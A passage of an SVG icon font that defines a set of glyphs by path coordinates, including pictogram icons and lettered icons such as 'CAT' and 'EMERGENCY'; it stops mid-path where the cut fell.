<glyph unicode="&#xe617;" d="M881.335 84.536c26.539 32.345 35.708 77.397 20.452 119.428l-14.059 38.597h84.602v713.38h-917.814v-713.385h493.573l53.807-147.832c15.332-42.069 51.378-70.571 92.395-78.27l23.688-78.792h217.436l-54.079 146.874zM854.307 333.34l-20.067 54.685-29.804 82.023c-45.375-16.553-68.786-66.63-52.186-111.893l32.641-89.126h-703.911v660.386h864.881v-660.386h-67.936l-23.618 64.31zM183.428 782.284c22.984 23.514 52.224 35.253 87.684 35.253 47.517 0 82.239-15.745 104.208-47.236 12.119-17.68 18.62-35.427 19.503-53.248h-59.613c-3.795 13.678-8.681 24.008-14.618 31.002-10.616 12.368-26.361 18.559-47.198 18.559-21.227 0-37.991-8.751-50.251-26.22-12.265-17.502-18.385-42.242-18.385-74.226 0-32.016 6.463-55.982 19.404-71.91 12.932-15.957 29.372-23.895 49.302-23.895 20.461 0 36.061 6.816 46.78 20.485 5.937 7.379 10.865 18.413 14.759 33.111h59.256c-5.125-31.11-18.164-56.372-39.142-75.884-21.015-19.47-47.94-29.203-80.727-29.203-40.598 0-72.507 13.143-95.735 39.471-23.27 26.464-34.863 62.732-34.863 108.779-0.005 49.828 13.209 88.21 39.635 115.162zM500.229 812.121h67.476l100.93-285.348h-64.662l-18.808 58.659h-105.082l-19.334-58.659h-62.375l101.855 285.348zM496.325 634.603h73.066l-36.061 112.255-37.005-112.255zM883.022 812.121v-50.538h-85.368v-234.811h-60.031v234.811h-85.72v50.538h231.119z" horiz-adv-x="1029" />
<glyph unicode="&#xe618;" d="M881.603 85.232c26.492 32.284 35.633 77.246 20.419 119.202l-14.031 38.517h84.433v712.014h-916.053v-712.018h492.629l53.704-147.545c15.299-41.984 51.285-70.435 92.221-78.12l23.632-78.641h217.022l-53.976 146.592zM854.627 333.556l-20.034 54.582-29.748 81.864c-45.281-16.525-68.646-66.499-52.088-111.677l32.585-88.952h-702.558v659.113h863.218v-659.113h-67.8l-23.575 64.183zM301.465 781.641c22.941 23.472 52.125 35.187 87.51 35.187 47.433 0 82.089-15.717 104.006-47.146 12.105-17.643 18.592-35.356 19.47-53.145h-59.495c-3.791 13.65-8.666 23.961-14.599 30.941-10.592 12.344-26.309 18.521-47.104 18.521-21.185 0-37.916-8.737-50.167-26.168-12.241-17.469-18.338-42.162-18.338-74.080 0-31.955 6.454-55.878 19.362-71.769 12.903-15.928 29.32-23.853 49.213-23.853 20.414 0 35.99 6.806 46.686 20.447 5.928 7.365 10.846 18.38 14.731 33.050h59.138c-5.115-31.044-18.127-56.264-39.067-75.738-20.978-19.433-47.846-29.146-80.572-29.146-40.518 0-72.37 13.115-95.551 39.396-23.228 26.413-34.797 62.614-34.797 108.567 0 49.725 13.19 88.036 39.574 114.937zM766.896 811.417v-50.439h-85.199v-234.36h-59.913v234.36h-85.556v50.439h230.668z" />
<glyph unicode="&#xe619;" d="M634.459 876.013v-27.715h-119.827v43.525h-34.644c0 27.064-29.418 61.785-71.211 61.785-40.692 0-77.556-31.773-77.556-79.719 0-22.777 13.082-43.132 24.633-50.071-45.774-16.901-107.147-74.886-119.263-110.19-16.843-33.668 29.39-61.88 53.162-28.222 23.763 33.668 50.434 74.963 129.627 94.773l0.134-34.883c-32.653-6.182-122.612-59.201-122.612-162.156v-598.341c0-14.853 6.929-39.582 36.625-39.582h263.532c29.706 0 36.634 24.739 36.634 39.582v598.341c0 102.955-86.762 155.973-119.818 162.156l0.163 41.62h120.411v-25.763l294.663-44.539v202.235l-294.654-42.836zM407.686 844.039c-18.863 0-34.146 15.293-34.146 34.146 0 18.844 15.283 34.127 34.146 34.127 18.853 0 34.137-15.283 34.137-34.127 0-18.853-15.283-34.146-34.137-34.146z" horiz-adv-x="1014" />
<glyph unicode="&#xe61a;" d="M874.473 488.866c84.146 0 134.238-50.124 134.238-126.896v-359.363c0-27.841-2.499-50.387-2.499-50.387h-384.249v349.269h-15.665l-71.323-106.416c-11.621-15.834-35.201-23.514-53.981-23.514h-167.443c-27.836 0-50.387 22.533-50.387 50.326 0 27.742 22.551 49.645 50.387 49.645h152.294l105.632 159.777c25.36 38.635 72.286 57.067 114.693 57.067 0-112.363 28-159.918 78.623-159.918v-186.814c-14.223-6.116-24.233-20.269-24.233-36.775 0-22.077 17.652-39.762 39.725-39.762 22.101 0 39.79 18.164 39.79 40.307 0 16.473-10.005 30.631-24.233 36.728v186.875c50.594 0.023 78.632 47.508 78.632 159.852zM842.907 488.866c-0.888-115.177-20.814-130.339-62.619-130.339-41.754 0-61.698 15.167-62.581 130.339h125.2zM779.607 748.276c63.474 0 114.918-51.444 114.918-114.956 0-63.465-51.449-114.932-114.918-114.932-63.474 0-114.975 51.468-114.975 114.932 0 63.507 51.496 114.956 114.975 114.956zM497.138 732.555c14.012 0 25.431 11.414 25.431 25.468s-11.414 25.45-25.431 25.45c-14.087 0-25.468-11.396-25.468-25.45s11.381-25.468 25.468-25.468zM315.199 872.866c20.020 0 36.263 16.243 36.263 36.272 0 20.015-16.243 36.291-36.263 36.291-20.053 0-36.291-16.276-36.291-36.291-0.009-20.034 16.238-36.272 36.291-36.272zM118.295 872.631c20.325 0 36.845 16.351 36.845 36.53 0 20.17-16.52 36.53-36.845 36.53-20.33 0-36.808-16.351-36.808-36.53-0.005-20.179 16.478-36.53 36.808-36.53zM462.59 512.864c0-8.22 6.783-14.928 15.045-14.928 8.225 0 14.909 6.703 14.909 14.928 0 12.255 0 89.285 0 89.285h11.687c0 0 0-77.030 0-89.285 0-8.22 6.684-14.928 14.947-14.928 8.258 0 15.008 6.703 15.008 14.928 0 12.255 0 166.893 0 166.893h11.551c0 0 0-49.396 0-56.588 0-6.167 4.979-11.151 11.104-11.151 6.167 0 11.001 4.988 11.001 11.151v64.334c0 18.009-15.867 32.627-33.825 32.627 0 0-69.064-0.052-69.336-0.080l-22.345 2.165-28.719 100.103c-11.579 40.373-45.38 39.095-45.38 39.095h-93.104c0 0-33.797 1.273-45.38-39.095l-15.045-52.421-15.045 52.421c-11.579 40.373-45.38 39.095-45.38 39.095h-72.037c0 0-33.773 1.273-45.361-39.095l-28.996-101.010c-2.776-9.418 1.851-18.225 10.080-20.607 8.258-2.335 17.272 3.391 19.47 10.926l28.151 98.473h13.777l-41.214-170.468h36.418v-121.081c0-9.991 8.056-18.084 18.028-18.084 10.005 0 18.16 8.093 18.16 18.084v121.081h15.252v-121.081c0-9.991 8.051-18.084 18.066-18.084 10.005 0 18.098 8.093 18.098 18.084v121.081h35.817l-40.847 170.468h13.777l28.169-98.473c1.921-6.539 7.92-11.832 15.012-11.236 7.093-0.601 14.322 4.697 16.177 11.236l28.207 98.473h12.683c0 0 0-270.627 0-288.059 0-11.738 9.596-21.269 21.382-21.269 11.729 0 21.288 9.531 21.288 21.269 0 17.422 0 163.892 0 163.892h15.726c0 0 0-146.46 0-163.892 0-11.738 9.526-21.269 21.288-21.269 11.743 0 21.33 9.531 21.33 21.269 0 17.422 0 288.059 0 288.059h13.777l26.187-95.199c1.644-5.712 7.572-11.283 13.913-13.195l36.535-10.221v-178.622h-0.005z" />
<glyph unicode="&#xe61b;" d="M406.29 489.025c-4.185 0-8.365-0.201-12.573-0.599v-40.338h14.373c11.811 0 16.791 5.985 16.791 19.984 0 11.764-3.17 20.952-18.591 20.952zM676.247 606.154v328.48h-328.802v-328.48h-328.924v-328.723h328.924v-328.484h328.802v328.484h328.826v328.723h-328.826zM132.578 375.174h-66.163v133.232h64.559v-21.588h-38.772v-31.95h34.989v-21.387h-34.989v-37.318h40.376v-20.99zM254.134 375.174h-24.179v86.283h-0.809l-24.983-50.718-25.189 50.517v-86.081h-25.189v133.232h24.183l26.189-50.527 25.792 50.527h24.188v-133.232zM346.711 375.174h-66.149v133.232h64.568v-21.588h-38.818v-31.95h35.026v-21.387h-35.026v-37.318h40.399v-20.99zM451.472 375.17h-26.956l-12.223 46.749c-0.987 3.792-1.796 5.583-5.19 5.583h-13.387v-52.332h-25.792v132.433c12.615 1.403 24.38 1.8 37.378 1.8 27.19 0 44.967-12.396 44.967-39.73 0-19.213-7.795-29.369-19.596-33.984v-0.201c2.81-0.8 3.811-2.805 4.61-6.172l16.188-54.146zM560.217 433.323c0-28.971-7.201-60.346-43.349-60.346-37 0-49.203 35.751-49.203 68.533 0 33.151 13.424 69.108 51.181 69.108 14.177 0 24.754-5.817 34.984-15.977l-14.2-18.979c-5.793 7.182-10.787 12.961-21.163 12.961-22.168 0-23.786-30.743-23.786-46.95 0-16.37 0.584-48.114 22.963-48.114 17.179 0 19.171 15.57 19.166 29.383v4.774h-18.142v21.144h41.559v-15.538zM648.594 375.174h-66.163v133.232h64.582v-21.588h-38.828v-31.95h35.017v-21.387h-35.017v-37.318h40.413v-20.99zM760.935 375.174h-22.575l-42.779 82.271h-0.599v-82.271h-25.184v133.232h24.983l40.81-78.89h0.365v78.89h24.983v-133.232zM833.33 372.977c-36.77 0-49.975 32.544-49.975 68.697 0 34.185 14.214 68.94 51.191 68.94 15.566 0 25.759-7.018 36.004-19.18l-15.421-18.208c-5.77 8.819-11.166 15.397-20.985 15.397-18.217 0-23.823-22.958-23.823-46.95 0-17.978 3.614-46.912 24.403-46.912 10.843 0 16.8 6.584 23.393 15.369l13.195-18.787c-8.805-10.782-21.602-18.381-37.982-18.367zM936.502 426.103v-50.933h-25.6v49.531l-34.807 83.706h27.597l20.204-60.72 20.181 60.72h26.208l-33.783-82.303z" horiz-adv-x="1019" />
<glyph unicode="&#xe61c;" d="M830.192 26.732v447.995c0 45.206-35.849 81.807-81.582 81.807h-449.010c-47.282 0-81.619-37.099-81.619-81.788l-0.122-0.019v-447.995c0-45.704 37.024-81.262 81.732-81.272h449.536c44.68 0 81.159 33.501 81.065 81.159v0.113zM745.566 30.377h-443.082v440.508h443.082v-440.508zM634.795 903.248c-0.489 58.584 84.287 59.27 84.776 0l-1.296-177.81 45.601 55.86c31.472 34.562 86.824-13.622 52.656-52.647l-110.592-131.645c-17.455-17.474-40.161-17.38-57.522 0l-110.066 132.143c-34.177 39.053 21.701 87.726 52.647 52.666l45.094-56.376-1.296 177.81zM327.069 627.745c-0.489-58.584 84.278-59.242 84.767 0l-1.287 177.828 45.591-55.85c31.49-34.562 86.833 13.622 52.666 52.647l-110.583 131.636c-17.474 17.474-40.199 17.361-57.541 0l-110.066-132.162c-34.187-39.025 21.682-87.707 52.647-52.647l45.075 56.376-1.268-177.828zM724.569 218.558c0-8.944-7.187-15.135-15.078-15.135 0 0-99.093 0-99.215 0-7.788 0-15.097 6.304-15.097 15.135v107.821c0 12.373 9.911 20.846 20.743 20.846-0.113 0 87.848 0 87.848 0 11.828 0 20.79-9.423 20.79-20.846v-107.821h0.009zM700.303 207.379h-37.747v-145.831c0-25.854 37.747-25.854 37.747 0v145.831zM656.816 207.379h-37.756v-145.831c0-25.666 37.756-25.666 37.756 0v145.831zM688.57 384.315c0-15.648-12.685-28.334-28.334-28.334s-28.334 12.685-28.334 28.334c0 15.648 12.685 28.334 28.334 28.334 15.648 0 28.334-12.685 28.334-28.334zM588.922 218.558c0-8.944-7.168-15.135-15.069-15.135 0 0-99.084 0-99.215 0-7.797 0-15.116 6.304-15.116 15.135v107.821c0 12.373 9.93 20.846 20.743 20.846-0.103 0 87.848 0 87.848 0 11.837 0 20.781-9.423 20.781-20.846v-107.821h0.028zM564.675 207.379h-37.756v-145.831c0-25.854 37.756-25.854 37.756 0v145.831zM521.197 207.379h-37.766v-145.831c0-25.666 37.766-25.666 37.766 0v145.831zM552.951 384.315c0-15.648-12.685-28.334-28.334-28.334-15.648 0-28.334 12.685-28.334 28.334 0 15.648 12.685 28.334 28.334 28.334 15.648 0 28.334-12.685 28.334-28.334zM453.313 218.558c0-8.944-7.196-15.135-15.088-15.135 0 0-99.084 0-99.215 0-7.779 0-15.106 6.304-15.106 15.135v107.821c0 12.373 9.921 20.846 20.743 20.846-0.113 0 87.848 0 87.848 0 11.828 0 20.79-9.423 20.79-20.846v-107.821h0.028zM429.056 207.379h-37.756v-145.831c0-25.854 37.756-25.854 37.756 0v145.831zM385.559 207.379h-37.747v-145.831c0-25.666 37.747-25.666 37.747 0v145.831zM417.322 384.315c0-15.648-12.685-28.334-28.334-28.334s-28.334 12.685-28.334 28.334c0 15.648 12.685 28.334 28.334 28.334 15.648 0 28.334-12.685 28.334-28.334z" horiz-adv-x="1015" />
<glyph unicode="&#xe61d;" d="M551.651 944.444c-171.859 0-330.252-129.029-363.249-271.196-7.35-31.571-15.594-114.16-15.594-114.16l-78.96-199.208c-1.59-3.586-2.417-7.631-2.417-11.877 0-16.809 13.667-30.505 30.542-30.505h8.388c-1.8 6.626-0.486 13.906 4.62 19.222 12.082 12.489 24.945 23.402 38.276 32.473 9.207 6.275 21.733 3.867 28.022-5.344 6.247-9.216 3.858-21.775-5.349-28.027-7.94-5.382-15.631-11.9-23.122-18.876v-74.093h17.801c11.152 0 20.195-9.006 20.195-20.157 0-11.147-9.043-20.185-20.195-20.185h-17.352c4.727-78.231 69.468-140.255 148.943-140.255h59.252v-116.025h88.691v15.117c0 11.156 9.043 20.19 20.195 20.19 11.147 0 20.157-9.038 20.157-20.19v-15.117h36.27v15.089c0 11.152 9.038 20.185 20.185 20.185 11.147 0 20.157-9.038 20.157-20.185v-15.089h198.572v321.55c88.101 69.291 144.735 177.040 144.735 297.867-0.014 209.2-169.493 378.796-378.763 378.796zM266.156 569.066c23.365 0 42.241-18.909 42.241-42.311 0-23.304-18.876-42.279-42.241-42.279-23.398 0-42.339 18.979-42.339 42.279-0.005 23.398 18.937 42.311 42.339 42.311zM219.702 372.537c-3.072 10.708 3.1 21.892 13.803 24.964 15.636 4.521 32.3 7.35 49.624 8.515 11.423 0.762 20.742-7.696 21.471-18.801 0.762-11.124-7.668-20.751-18.778-21.481-14.458-0.963-28.298-3.31-41.128-7.042-1.861-0.514-3.731-0.79-5.588-0.79-8.772 0.009-16.847 5.77-19.405 14.635zM297.283 202.516h-46.141c-11.152 0-20.153 9.043-20.153 20.185 0 11.152 9.001 20.157 20.153 20.157h46.141c11.147 0 20.153-9.006 20.153-20.157 0-11.142-9.006-20.185-20.153-20.185zM560.558 480.777h46.141c11.147 0 20.153-9.043 20.153-20.19 0-11.152-9.006-20.157-20.153-20.157h-46.141c-11.152 0-20.157 9.006-20.157 20.157 0 11.152 9.010 20.19 20.157 20.19zM451.266 427.595c9.249 16.604 23.538 30.271 41.348 39.412 9.903 5.106 22.084 1.244 27.152-8.664 5.111-9.908 1.248-22.088-8.664-27.194-10.694-5.531-19.189-13.532-24.571-23.197-3.694-6.63-10.558-10.357-17.632-10.357-3.306 0-6.696 0.795-9.8 2.52-9.73 5.429-13.251 17.712-7.832 27.48zM324.823 386.181c1.833 10.974 12.078 18.46 23.197 16.665 16.253-2.656 32.441-6.799 48.030-12.283 10.525-3.694 16.052-15.192 12.358-25.712-2.899-8.314-10.698-13.536-19.049-13.536-2.212 0-4.451 0.383-6.663 1.174-13.387 4.695-27.265 8.187-41.203 10.525-11.012 1.8-18.465 12.162-16.669 23.169zM418.409 193.716c-3.656-6.728-10.6-10.563-17.745-10.563-3.278 0-6.551 0.795-9.627 2.445-11.591 6.322-24.258 10.909-37.612 13.705-10.909 2.277-17.913 12.938-15.669 23.847 2.277 10.937 12.975 17.95 23.879 15.678 17.221-3.6 33.61-9.567 48.661-17.749 9.805-5.349 13.429-17.6 8.113-27.363zM426.695 355.98c3.932 6.181 10.698 9.151 17.534 9.006 2.039 6.42 6.934 11.834 13.934 13.639 10.843 2.726 21.813-3.778 24.539-14.574 5.041-19.741 15.295-36.752 15.393-36.925 5.831-9.487 2.862-21.92-6.626-27.746-3.31-2.043-6.939-3.011-10.563-3.011-5.176 0-10.249 2.043-14.079 5.765-0.033 0.037-0.108 0.075-0.136 0.103-10.492 9.562-21.845 18.259-33.82 25.89-9.389 5.976-12.148 18.465-6.177 27.854zM452.748 117.449c-5.793 12.737-13.008 24.408-21.429 34.648-7.074 8.636-5.835 21.331 2.796 28.401 8.594 7.112 21.326 5.831 28.401-2.796 10.628-12.943 19.704-27.615 26.951-43.527 4.624-10.146 0.173-22.117-9.973-26.703-2.726-1.248-5.55-1.838-8.351-1.838-7.659 0.009-15.014 4.395-18.395 11.816zM510.485 21.885c0-11.156-9.006-20.19-20.153-20.19-11.152 0-20.195 9.038-20.195 20.19v11.283c0 10.806-0.762 21.495-2.244 31.814-1.585 11.040 6.074 21.294 17.081 22.893 11.287 1.552 21.252-6.079 22.846-17.123 1.796-12.213 2.656-24.843 2.656-37.579l0.009-11.287zM524.461 223.22c-5.906 12.882-12.975 25.296-21.050 36.995-6.35 9.179-4.045 21.738 5.106 28.059 9.183 6.345 21.733 4.068 28.092-5.106 9.389-13.602 17.67-28.097 24.539-43.097 4.657-10.118 0.206-22.093-9.903-26.75-2.726-1.248-5.592-1.838-8.43-1.838-7.622 0.005-14.935 4.353-18.353 11.736zM546.648 127.942c-0.379 14.182-2.001 28.401-4.83 42.274-2.24 10.941 4.83 21.565 15.739 23.814 10.876 2.24 21.565-4.825 23.809-15.771 3.287-16.15 5.181-32.717 5.625-49.213 0.318-11.147-8.454-20.391-19.592-20.704-0.21-0.037-0.379-0.037-0.594-0.037-10.871 0-19.844 8.697-20.157 19.638zM587.098 21.848c0-11.152-9.006-20.19-20.157-20.19s-20.185 9.043-20.185 20.19v46.103c0 11.147 9.038 20.195 20.185 20.195s20.157-9.052 20.157-20.195v-46.103zM598.175 348.527v34.381l6.663 0.070c42.896 0.070 77.894 34.989 78.030 77.857-0.131 42.858-35.134 77.791-78.030 77.861l-6.663 0.037v34.334h6.696c61.982 0 112.402-50.316 112.402-112.233 0-61.912-50.419-112.308-112.402-112.308h-6.696z" horiz-adv-x="1019" />
<glyph unicode="&#xe61e;" d="M911.085 605.952v-264.401h-141.691l-193.555 197.006c0 0-31.080 60.473 29.412 67.394h305.835zM707.48 849.294c0-51.537-41.779-93.317-93.317-93.317-51.537 0-93.317 41.779-93.317 93.317 0 51.537 41.779 93.317 93.317 93.317 51.537 0 93.317-41.779 93.317-93.317zM625 453.158l-102.741 104.391v165.139c0.209 2.437 0.332 4.902 0.332 7.386 0 51.532-41.785 93.307-93.326 93.307-10.98 0-21.523-1.906-31.317-5.395l-0.104 0.521-2.399-1.46c-10.743-4.181-20.508-10.278-28.89-17.873l-188.407-116.48c-1.166-0.702-2.342-1.394-3.47-2.152l-3.224-1.982 0.076-0.152c-23.846-16.858-39.471-44.639-39.5-76.108l-0.332 0.209v-572.416c-0.256-2.541-0.408-5.12-0.408-7.708 0-39.433 31.981-71.405 71.415-71.405 39.424 0 71.415 31.981 71.415 71.405 0 3.423-0.275 6.77-0.721 10.050v487.159l-2.285 1.327c0.341 0.199 0.692 0.398 1.043 0.597l1.242-1.915 155.525 101.49v-108.402l132.617-128.332 0.284 0.303c8.448-8.552 20.186-13.852 33.138-13.852 25.761 0 46.649 20.878 46.649 46.649 0.057 14.308-6.447 27.136-16.612 35.698zM837.414 686.545c0-8.593-6.966-15.559-15.559-15.559s-15.559 6.966-15.559 15.559c0 8.593 6.966 15.559 15.559 15.559 8.593 0 15.559-6.966 15.559-15.559zM801.119 669.269c0-8.593-6.966-15.559-15.559-15.559s-15.559 6.966-15.559 15.559c0 8.593 6.966 15.559 15.559 15.559 8.593 0 15.559-6.966 15.559-15.559zM713.207 750.677c0 6.466 5.224 11.691 11.653 11.691 6.457 0 11.662-5.224 11.662-11.691 0-6.409-5.215-11.643-11.662-11.643-6.438 0.009-11.653 5.234-11.653 11.643zM699.61 738.816c0-6.446-5.226-11.672-11.672-11.672s-11.672 5.226-11.672 11.672c0 6.446 5.226 11.672 11.672 11.672 6.446 0 11.672-5.226 11.672-11.672zM668.7 711.177c0-6.441-5.221-11.662-11.662-11.662s-11.662 5.221-11.662 11.662c0 6.441 5.221 11.662 11.662 11.662 6.441 0 11.662-5.221 11.662-11.662zM652.961 672.493c0-6.446-5.226-11.672-11.672-11.672s-11.672 5.226-11.672 11.672c0 6.446 5.226 11.672 11.672 11.672 6.446 0 11.672-5.226 11.672-11.672zM652.961 634.273c0-6.446-5.226-11.672-11.672-11.672s-11.672 5.226-11.672 11.672c0 6.446 5.226 11.672 11.672 11.672 6.446 0 11.672-5.226 11.672-11.672zM689.436 634.273c0-6.446-5.226-11.672-11.672-11.672s-11.672 5.226-11.672 11.672c0 6.446 5.226 11.672 11.672 11.672 6.446 0 11.672-5.226 11.672-11.672zM689.436 669.696c0-6.446-5.226-11.672-11.672-11.672s-11.672 5.226-11.672 11.672c0 6.446 5.226 11.672 11.672 11.672 6.446 0 11.672-5.226 11.672-11.672zM704.123 702.54c0-6.441-5.221-11.662-11.662-11.662s-11.662 5.221-11.662 11.662c0 6.441 5.221 11.662 11.662 11.662 6.441 0 11.662-5.221 11.662-11.662zM736.095 717.208c0-6.446-5.226-11.672-11.672-11.672s-11.672 5.226-11.672 11.672c0 6.446 5.226 11.672 11.672 11.672 6.446 0 11.672-5.226 11.672-11.672zM775.092 746.060c0-7.090-5.748-12.838-12.838-12.838s-12.838 5.748-12.838 12.838c0 7.090 5.748 12.838 12.838 12.838 7.090 0 12.838-5.748 12.838-12.838zM773.566 705.65c0-7.090-5.748-12.838-12.838-12.838s-12.838 5.748-12.838 12.838c0 7.090 5.748 12.838 12.838 12.838 7.090 0 12.838-5.748 12.838-12.838zM810.278 725.087c0-7.085-5.743-12.828-12.828-12.828-7.085 0-12.828 5.743-12.828 12.828 0 7.085 5.743 12.828 12.828 12.828 7.085 0 12.828-5.743 12.828-12.828z" horiz-adv-x="1015" />
<glyph unicode="&#xe61f;" d="M87.716 416.707h88.745c6.741 0 12.969-3.359 16.685-8.897 0 0 16.915-25.53 33.797-50.871 9.366 82.982 41.956 373.027 41.956 373.027 1.127 9.568 8.972 17.121 18.728 17.685 9.681 0.597 18.352-5.872 20.593-15.29 0 0 42.501-178.195 62.614-262.384 13.232 37.423 26.61 75.325 26.61 75.325 2.804 7.929 10.315 13.307 18.737 13.35 8.394 0.038 15.989-5.19 18.864-13.124 0 0 39.476-107.219 47.381-128.817 19.987 0 77.021 0 77.021 0 6.731 0 12.969-3.359 16.675-8.901 0 0 16.929-25.534 33.783-50.881 9.39 82.982 41.979 373.032 41.979 373.032 1.080 9.568 8.934 17.121 18.7 17.685 9.676 0.597 18.385-5.872 20.626-15.294 0 0 42.463-178.12 62.581-262.384 13.227 37.423 26.652 75.325 26.652 75.325 2.795 7.929 10.268 13.307 18.69 13.35 8.413 0.038 16.036-5.19 18.874-13.124 0 0 39.513-107.215 47.409-128.817 13.786 0 54.681 0 78.721 0l4.185 7.999c38.236 65.794 66.156 187.617 66.156 276.33 0 113.194-82.38 249.931-242.923 249.931-229.404 0-258.894-214.899-258.894-214.899s-28.451 213.856-257.714 213.856c-154.882 0-237.972-131.772-237.972-248.888 0-101.155 44.295-226.013 66.978-277.297l3.762-7.027zM851.461 376.71c-8.413 0-15.891 5.27-18.756 13.082 0 0-17.718 48.109-33.092 89.868-14.355-40.749-30.64-86.918-30.64-86.918-2.955-8.366-11.039-13.791-19.888-13.265-8.859 0.409-16.37 6.656-18.39 15.322 0 0-28.597 119.77-51.806 217.074-13.801-122.575-35.328-313.973-35.328-313.973-0.935-8.3-7.027-15.21-15.214-17.15-8.187-1.987-16.671 1.348-21.349 8.338 0 0-48.485 72.972-58.279 87.618-16.666 0-80.252 0-80.252 0-8.366 0-15.867 5.261-18.728 13.082 0 0-17.718 48.109-33.083 89.863-14.425-40.744-30.72-86.918-30.72-86.918-2.955-8.37-11.029-13.791-19.883-13.265-8.864 0.409-16.356 6.656-18.455 15.322 0 0-28.54 119.775-51.707 216.928-13.796-122.462-35.309-313.818-35.309-313.818-0.949-8.3-7.027-15.21-15.196-17.15-8.187-1.987-16.671 1.348-21.363 8.338 0 0-48.48 72.972-58.274 87.618-8.126 0-33.886 0-56.311 0 143.421-254.83 403.221-422.672 403.221-422.672s264.502 167.875 410.201 422.672l-71.398 0.005z" />
<glyph unicode="&#xe620;" d="M232.819 769.282c42.778 0 77.397 34.684 77.397 77.429 0 42.75-34.623 77.397-77.397 77.397-42.731 0-77.397-34.647-77.397-77.397 0.005-42.74 34.666-77.429 77.397-77.429zM813.653 770.367c43.407 0 78.637 35.215 78.637 78.618 0 43.417-35.229 78.641-78.637 78.641-43.44 0-78.599-35.229-78.599-78.641-0.005-43.403 35.159-78.618 78.599-78.618zM204.218 328.671c-101.756 0-184.254-82.484-184.254-184.235 0-101.756 82.493-184.25 184.254-184.25s184.25 82.493 184.25 184.25c0 101.747-82.493 184.235-184.25 184.235zM226.060 27.479v-29.442h-44.041v29.442c-46.982 5.383-76.936 50.101-76.936 79.327h46.954c0-13.143 10.127-30.593 30.415-34.769v55.207c-10.127 1.954-15.797 3.551-26.662 6.534-27.756 7.666-46.977 31.039-46.977 60.834 0 29.513 28.818 62.633 73.216 68.505v27.498h44.051v-27.498c47.085-6.059 76.044-40.852 76.044-75.612l-45.995 0.023c-0.033 15.196-12.673 29.001-30.053 30.701v-51.768c12.777-2.823 12.777-2.494 24.534-5.698 43.802-11.922 53.675-40.598 53.675-64.639-0.009-36.934-29.541-62.276-78.223-68.646zM182.014 174.531c-19.681 3.504-25.135 11.926-25.135 21.011 0 10.606 13.345 20.832 25.135 22.204v-43.215zM226.591 72.244v46.653c19.442-2.785 31.758-11.156 31.758-23.162 0-10.62-11.471-22.725-31.758-23.491zM131.814 635.204h30.518l-35.267-131.25h211.508l-35.258 131.25h30.518l36.141-131.25h68.049l-43.656 159.194c-11.644 38.503-49.744 79.337-99.662 79.337h-123.782c-49.96 0-88.055-40.833-99.708-79.337l-43.619-159.194h68.049l36.169 131.25zM897.668 743.274c38.625 0 69.966-31.293 69.966-69.909l-0.117-214.627h45.047v-87.984l-91.131-0.047v-364.389c0-25.473-20.889-46.127-46.381-46.127-25.422 0-46.089 20.658-46.089 46.127 0 34.807 0 319.944 0 364.351h-29.391c0-44.441 0-329.545 0-364.351 0-25.473-20.687-46.127-46.174-46.127-25.464 0-46.315 20.658-46.315 46.127 0 19.672 0 198.097 0 364.328l-687.113-0.211v88.308h687.123c0 114.979 0 206.646 0 206.646l-146.789-173.798c-30.88-35.671-85.866 8.887-54.883 47.029l152.102 182.742c9.845 9.798 18.662 21.917 54.981 21.917h185.166z" />
<glyph unicode="&#xe621;" d="M227.486 784.97c32.856 18.218 63.707 23.287 91.695 15.085 29.002-8.481 50.52-29.556 63.427-45.559-33.029-24.72-53.388-64.116-54.165-106.915-0.074-2.793 0.4-5.274 0.88-7.764 1.978-10.896 8.648-19.27 20.089-24.176 0.647-0.275 2.588-0.88 6.74-0.88 11.338 0 25.162 4.561 25.307 4.594l183.18 51.894c14.061 4.082 21.392 11.678 22.235 23.217l0.275 1.839c0 0.102 0 0.237 0 0.34 1.462 8.346-7.387 22.477-15.048 26.698-11.739 6.572-22.542 12.837-32.619 18.73-37.32 21.723-64.279 37.45-91.56 37.45-2.998 0-6.023-0.344-9.058-0.712-15.839 22.751-49.915 62.715-102.293 78.28-44.060 13.107-90.461 6.405-138.003-19.982-18.52-10.282-112.873-57.512-178.339 1.499v-71.433c87.775-42.878 185.735 5.851 207.258 17.794zM777.346 645.781c-26.224 6.060-94.585 12.94-94.585 12.94l-59.443 23.561c-3.449-15.183-14.243-37.725-48.054-47.569l-183.217-51.894c-6.065-1.908-21.113-6.093-35.891-6.093-7.894 0-14.671 1.154-20.699 3.537-16.789 7.187-29.077 18.46-36.501 32.586-17.361-21.281-27.885-48.319-27.923-77.908l0.033-49.138-49.301 0.033c-46.55 64.358-118.9 108.795-201.984 117.574v-570.801c83.354 8.844 155.941 53.555 202.426 118.249h219.21c57.372-72.969 146.651-119.887 246.756-119.924 173.391 0.037 313.875 140.493 313.935 313.875 0 142.471-106.985 273.669-224.763 300.972zM650.719 597.434c0 9.258 7.731 15.933 15.974 15.933 9.258 0 15.933-6.675 15.933-15.933v-68.85c0-8.243-6.675-15.97-15.933-15.97-8.243 0-15.974 7.727-15.974 15.97v68.85zM696.483 304.3c0-52.266-42.361-94.794-94.459-94.794-52.168 0-94.618 42.529-94.618 94.794v7.145h31.8v-7.145c0.074-34.597 28.225-62.86 62.79-62.957 34.56 0.098 62.692 28.365 62.725 62.957v7.145h31.767l-0.005-7.145z" horiz-adv-x="1015" />
<glyph unicode="&#xe622;" d="M541.126 711.149v20.143h26.315v12.732c0 22.659 19.797 40.983 44.294 40.983 24.454 0 44.242-18.324 44.242-40.983v-12.732h25.745v-20.143h-140.597zM867.169 201.927c0-51.92-42.035-94.007-93.913-94.007-51.915 0-94.007 42.092-94.007 94.007 0 51.915 42.096 93.988 94.007 93.988 51.878 0 93.913-42.073 93.913-93.988zM818.153 201.927c0 24.843-20.106 44.934-44.916 44.934-24.838 0-44.967-20.092-44.967-44.934s20.129-44.981 44.967-44.981c24.81 0.005 44.916 20.139 44.916 44.981zM329.097 202.824c0-51.92-42.087-93.97-94.002-93.97-51.883 0-93.96 42.045-93.96 93.97 0 51.883 42.082 94.007 93.96 94.007 51.911 0 94.002-42.124 94.002-94.007zM280.249 202.74c0 24.833-20.125 44.934-44.953 44.934s-44.972-20.106-44.972-44.934c0-24.866 20.143-44.972 44.972-44.972 24.828 0 44.953 20.106 44.953 44.972zM931.003 469.2c28.073-5.466 44.883-17.59 57.554-86.872l20.045-125.040c7.219-40.693-15.781-55.53-44.448-55.53h-68.865c0 67.42-54.623 122.277-122.043 122.277-67.43 0-122.108-54.856-122.108-122.277h-294.281c0 67.42-54.651 122.277-122.076 122.277-67.453 0-122.104-54.856-122.104-122.277h-57.063c-20.092 0-35.751 15.215-35.751 34.844v411.166c0 22.402 17.684 40.404 39.356 40.404h738.851c28.078 0 